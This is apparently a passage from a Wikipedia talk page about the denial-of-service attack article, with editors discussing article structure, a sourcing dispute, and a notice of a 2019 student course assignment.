big history gap from 1997 to 2018 which does not make the article flow well. notable dos/ddos incidents would be better served by a separate section further down the page.LadyPugilist (talk) 14:25, 3 November 2020 (UTC)

"Misleading"?
Sorry, but how is my phrase misleading? Also, the fact that educational institutions or an accidental refresh of all open tabs could cause the false appearance of a DoS attack does not need a source, as is self-explanatory. I speak from experience, as I co-operate a small site. — Preceding unsigned comment added by MKAFL2489 (talk • contribs) 00:38, 17 October 2021 (UTC)

Wiki Education Foundation-supported course assignment
This article was the subject of a Wiki Education Foundation-supported course assignment, between 16 January 2019 and 22 May 2019. Further details are available on the course page. Student editor(s): Alassane togola. Peer reviewers: Alassane togola.

Above undated message substituted from Template:Dashboard.wikiedu.org assignment by PrimeBOT (talk) 19:18, 16 January 2022 (UTC)